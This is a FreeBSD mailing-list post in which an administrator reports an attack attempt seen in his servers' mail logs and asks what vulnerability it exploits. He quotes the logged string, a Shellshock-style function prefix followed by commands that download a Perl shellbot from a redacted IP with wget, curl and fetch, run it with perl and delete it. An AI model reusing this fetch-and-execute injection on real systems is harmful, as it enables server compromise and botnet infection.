Date: Sun, 11 Jun 2023 13:38:58 +0200 From: Andrea Venturoli <ml@netfence.it> To: freebsd-questions@freebsd.org Subject: Attempted mail attack Message-ID: <7128b00c-0427-6f76-bd37-770947aae245@netfence.it>
next in thread | raw e-mail | index | archive | help
Hello.
Checking daily periodics of different servers, I'm seeing a variation of
this:
> Checking for rejected mail hosts:
> 1 553 check_mail () { :; }; cd /tmp;wget x.y.z.w5/meh;perl meh;curl -O x.y.z.w/meh;perl meh;fetch http://x.y.z.w/meh;perl meh;rm -f meh* {:;};cd/tmp;wget.x.y.z.w/meh;...
(I've redacted the C&C IP, even if it's already down).
Of course they are attempting to download a Perl Shellbot (and failing).
I'm curious, though, what vulnerability they are trying to exploit in
order to do this?
Is it some old one in sendmail? Or what?
bye & Thanks
av.
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?7128b00c-0427-6f76-bd37-770947aae245>